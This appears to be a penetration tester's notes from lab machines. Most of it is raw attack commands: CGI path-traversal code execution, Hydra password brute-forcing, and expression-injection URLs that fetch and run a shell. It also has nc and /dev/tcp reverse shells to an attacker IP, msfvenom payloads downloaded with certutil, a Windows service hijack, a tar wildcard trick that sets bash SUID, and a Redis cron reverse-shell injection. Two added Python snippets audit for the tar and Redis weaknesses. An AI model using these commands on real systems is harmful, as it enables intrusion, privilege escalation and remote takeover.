Misc
curl -s --path-as-is -d "echo Content-Type: text/plain; echo; whoami" "192.168.231.149/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2";
hydra -l kiero -P /usr/share/wordlists/rockyou.txt ftp://192.168.231.149
hydra -l kiero -P /usr/share/wordlists/rockyou.txt ssh://192.168.231.149
john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash
CVE-2022-0847 (DirtyPipe)
curl http://192.168.45.166/50808.c -o priv.c
gcc priv.c -o exploit1
find / -perm -4000 2>/dev/null
./exploit1 /home/john/RESET_PASSWD
---------------
python textshell2.py -u 'http://192.168.245.150:8080/search?query=' -c 'whoami' -m 'rce'
sudo tcpdump -i tun0
http://192.168.245.150:8080/search?query=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime().exec(%27ping%20192.168.45.166%27)%7D
http://192.168.245.150:8080/search?query=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime().exec(%27wget%20192.168.45.166/testshell%20-O%20/tmp/testshell%27)%7D
http://192.168.245.150:8080/search?query=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime().exec(%27sh%20/tmp/testshell%27)%7D
ssh -R 5555:127.0.0.1:8000 -vv -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null [email protected]
ssh-keygen -t rsa -f ~/.ssh/id_rsa
cat ~/.ssh/id_rsa.pub >> /home/kali/.ssh/authorized_keys
wget http://192.168.45.166/id_rsa -O id_rsa
ssh -i id_rsa -R 5555:127.0.0.1:8000 -vv -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null [email protected]
nmap -sV -Pn -n -p 5555 --script=banner 127.0.0.1
$ python ./jdwp-shellifier.py -t 127.0.0.1 -p 5555 --cmd "ncat -v -l -p 1234 -e /bin/bash"
$ python ./jdwp-shellifier.py -t 127.0.0.1 -p 5555 --cmd "nc -e /bin/bash 192.168.45.166 2233"
$ python ./jdwp-shellifier.py -t 127.0.0.1 -p 5555 --cmd "ncat -v -l -p 1234 -e /bin/bash"
$ python ./jdwp-shellifier.py -t 127.0.0.1 -p 5555 --cmd "bash -c 'bash -i >& /dev/tcp/192.168.45.166/2233 0>&1'"
wget http://192.168.45.166/linpeas.sh -O /tmp/linpeas.sh
wget http://192.168.45.166/41154.sh -O lpe.sh
[+] [CVE-2021-3156] sudo Baron Samedit 2
[+] [CVE-2021-3156] sudo Baron Samedit
[+] [CVE-2021-4034] PwnKit
---------------------------------------------------------------------------------------------------------------------------------------------------------------------
python3 ~/Downloads/AutoRecon-main/autorecon.py 192.168.245.151
python3 free.py 192.168.245.151 'type c:\users\chris\Desktop\local.txt'
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.166 LPORT=443 -f exe -o 2shell.exe
python3 free.py 192.168.245.151 'certutil.exe -urlcache -split -f http://192.168.45.166/2shell.exe c:\users\public\2shell.exe'
python3 free.py 192.168.245.151 'c:\users\public\2shell.exe'
iwr -uri http://192.168.45.166/winPEASx64.exe -Outfile wpeas.exe
.\nc.exe 192.168.45.166 1337 -e cmd
iwr -uri http://192.168.45.166/SigmaPotato.exe -Outfile sp.exe
.\sp.exe "nc.exe 192.168.45.166 2337 -e cmd"
Service Changes:
python3 51010.py --target 192.168.232.155 --lhost 192.168.45.172 --file shell.exe
GPGOrchestrator(Genomedics srl - GPG Orchestrator)["C:\Program Files\MilleGPG5\GPGService.exe"] - Auto - Running
YOU CAN MODIFY THIS SERVICE: AllAccess
File Permissions: Users [WriteData/CreateFiles]
Possible DLL Hijacking in binary folder: C:\Program Files\MilleGPG5 (Users [WriteData/CreateFiles])
LOOKS LIKE YOU CAN MODIFY OR START/STOP SOME SERVICE/s:
GPGOrchestrator: AllAccess
C:\Program Files\MilleGPG5(Users [WriteData/CreateFiles])
iwr -uri http://192.168.45.172/shell.exe -Outfile 2shell.exe
sc config GPGOrchestrator binpath="C:\users\public\2shell.exe"
net stop GPGOrchestrator
net start GPGOrchestrator
TAR Number:
cat /etc/cron.d
CronJob:
*/2 * * * * root cd /opt/admin && tar -zxf /tmp/backup.tar.gz *
📜 Malicious Script Injected (in /opt/admin/test.sh)
echo "chmod u+s /bin/bash" > test.sh
echo "" > "--checkpoint-action=exec=sh test.sh"
echo "" > "--checkpoint=1"
Explanation:
This abuses two GNU tar options, --checkpoint and --checkpoint-action:
--checkpoint=1: triggers the checkpoint action at every checkpoint.
--checkpoint-action=exec=sh test.sh: executes the test.sh script at each checkpoint.
test.sh runs chmod u+s /bin/bash, setting the SUID bit, which allows any user to run bash with root privileges.
Neither of these is typed as a shell option; each one is a file name. The trick is:
The cron job runs tar with an unquoted * glob, so the shell expands it into the names of the files in /opt/admin and passes them to tar as arguments. tar then parses any argument starting with -- as an option instead of a file name. So:
--checkpoint-action=exec=sh test.sh becomes an option to tar during extraction.
It tells tar: "after every checkpoint, run sh test.sh."
Combined with:
echo "" > "--checkpoint=1"
this adds another fake file named --checkpoint=1, telling tar to trigger the action at every checkpoint.
Then execute /bin/bash -p (-p keeps the effective uid granted by the SUID bit).
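Added example (not from the original notes) showing the defender's side of the tar checkpoint trick above: it lists option-shaped file names in a directory, reconstructs the argument vector the shell hands to tar for the cron line "tar -zxf /tmp/backup.tar.gz *", and shows that placing "--" before the glob stops those names from being parsed as options. The directory and file names are constructed to mirror the planted files above; nothing here runs tar itself.

```python
import os
import tempfile
from typing import List


def find_option_like_names(directory: str) -> List[str]:
    """List entries whose names begin with '-'.

    Such names are harmless as files, but an unquoted shell glob turns them into
    command-line arguments, and tar parses anything starting with '-' as an option.
    """
    return sorted(name for name in os.listdir(directory) if name.startswith("-"))


def tar_option_args(argv: List[str]) -> List[str]:
    """Return the arguments tar would treat as options (getopt rules).

    Everything after a bare '--' is a file name regardless of its spelling.
    """
    options: List[str] = []
    for arg in argv[1:]:
        if arg == "--":
            break
        if arg.startswith("-"):
            options.append(arg)
    return options


def naive_tar_argv(archive: str, directory: str) -> List[str]:
    """Approximates what the shell hands to tar for 'tar -zxf ARCHIVE *' (glob expanded, no '--')."""
    return ["tar", "-zxf", archive] + sorted(os.listdir(directory))


def hardened_tar_argv(archive: str, directory: str) -> List[str]:
    """Same extraction with '--' after the archive: option-shaped names stay file names."""
    return ["tar", "-zxf", archive, "--"] + sorted(os.listdir(directory))


def build_demo_dir() -> str:
    """Create a constructed sample directory mirroring the planted files above."""
    path = tempfile.mkdtemp(prefix="optadmin-")
    for name in ("test.sh", "--checkpoint=1",
                 "--checkpoint-action=exec=sh test.sh", "report.txt"):
        open(os.path.join(path, name), "w").close()
    return path


if __name__ == "__main__":
    demo = build_demo_dir()
    print("suspicious names:", find_option_like_names(demo))
    print("naive argv, parsed as options:",
          tar_option_args(naive_tar_argv("/tmp/backup.tar.gz", demo)))
    print("hardened argv, parsed as options:",
          tar_option_args(hardened_tar_argv("/tmp/backup.tar.gz", demo)))
```

The fix for the cron job is "tar -zxf /tmp/backup.tar.gz -- *" (or "./*", which also prefixes every name), plus not running root jobs against a directory that unprivileged users can write to. The glob order here is bytewise, whereas the shell sorts by locale; that does not change which names become options.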
python3 -c 'import pty; pty.spawn("/bin/bash")'
# Connect to Redis server
redis-cli -h <target_ip> -p <port>
# Inject reverse shell into key
SET 1 "\n\n* * * * * bash -i >& /dev/tcp/<attacker_ip>/4444 0>&1\n\n"
# Point Redis's dump directory to cron path
CONFIG SET dir /var/spool/cron/crontabs/
CONFIG SET dbfilename root
# Save the malicious key as a file (cron job)
SAVE
import subprocess

# Path to the usernames file (one username per line)
user_file = "usernames.txt"
# Redis host
redis_host = "canyoupwnme"

# Read usernames from the file
with open(user_file, "r") as f:
    usernames = [line.strip() for line in f if line.strip()]

# Loop through usernames and run redis-cli commands
for user in usernames:
    redis_dir = f"/root/{user}"
    # Ask the server to change its working directory; the reply shows whether the path was accepted
    command = ["redis-cli", "-h", redis_host, "CONFIG", "SET", "dir", redis_dir]
    try:
        print(f"[*] Setting dir to: {redis_dir}")
        output = subprocess.check_output(command, stderr=subprocess.STDOUT)
        print(output.decode().strip())
    except subprocess.CalledProcessError as e:
        print(f"[!] Failed for {user}: {e.output.decode().strip()}")
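Added example (not from the original notes) for the Redis section above: a small audit of a redis.conf that flags the settings which let an unauthenticated client run CONFIG SET dir / dbfilename and SAVE, shown against a constructed weak config and a constructed hardened one. The directives used (bind, protected-mode, requirepass, rename-command) are standard redis.conf options; the sample values are made up for the demonstration.

```python
import shlex
from typing import Dict, List

# Constructed sample: exposed on every interface, no auth, CONFIG reachable.
WEAK_CONF = """
bind 0.0.0.0
protected-mode no
port 6379
dir /var/lib/redis
"""

# Constructed sample: loopback only, password required, CONFIG disabled.
HARDENED_CONF = """
bind 127.0.0.1
protected-mode yes
port 6379
dir /var/lib/redis
requirepass "replace-with-a-long-random-secret"
rename-command CONFIG ""
"""


def parse_redis_conf(text: str) -> Dict[str, List[List[str]]]:
    """Map each directive (lowercased) to every argument vector it was given."""
    conf: Dict[str, List[List[str]]] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = shlex.split(line)  # handles quoted values such as rename-command CONFIG ""
        conf.setdefault(parts[0].lower(), []).append(parts[1:])
    return conf


def audit_redis_conf(text: str) -> List[str]:
    """Return finding codes; an empty list means none of the checked weaknesses is present."""
    conf = parse_redis_conf(text)
    findings: List[str] = []

    # No bind line (Redis then listens on all interfaces) or an explicit wildcard address.
    binds = [addr for args in conf.get("bind", []) for addr in args]
    if not binds or any(a.lstrip("-") in ("0.0.0.0", "::", "*", "::*") for a in binds):
        findings.append("bind-all-interfaces")

    # protected-mode defaults to yes; only an explicit "no" is a finding.
    pm = conf.get("protected-mode", [["yes"]])[-1]
    if pm and pm[0].lower() == "no":
        findings.append("protected-mode-off")

    # Without requirepass any client that can reach the port can issue CONFIG SET.
    password = conf.get("requirepass", [[""]])[-1]
    if not password or not password[0]:
        findings.append("no-requirepass")

    # Renaming CONFIG (to "" disables it) stops clients from rewriting dir/dbfilename.
    renamed = {args[0].upper() for args in conf.get("rename-command", []) if args}
    if "CONFIG" not in renamed:
        findings.append("config-command-not-renamed")

    return findings


if __name__ == "__main__":
    print("weak:", audit_redis_conf(WEAK_CONF))
    print("hardened:", audit_redis_conf(HARDENED_CONF))
```

Run it against a real config with audit_redis_conf(open("/etc/redis/redis.conf").read()). Beyond the config, running redis as a dedicated low-privilege user means a rewritten dir/dbfilename cannot land a file in /var/spool/cron/crontabs in the first place.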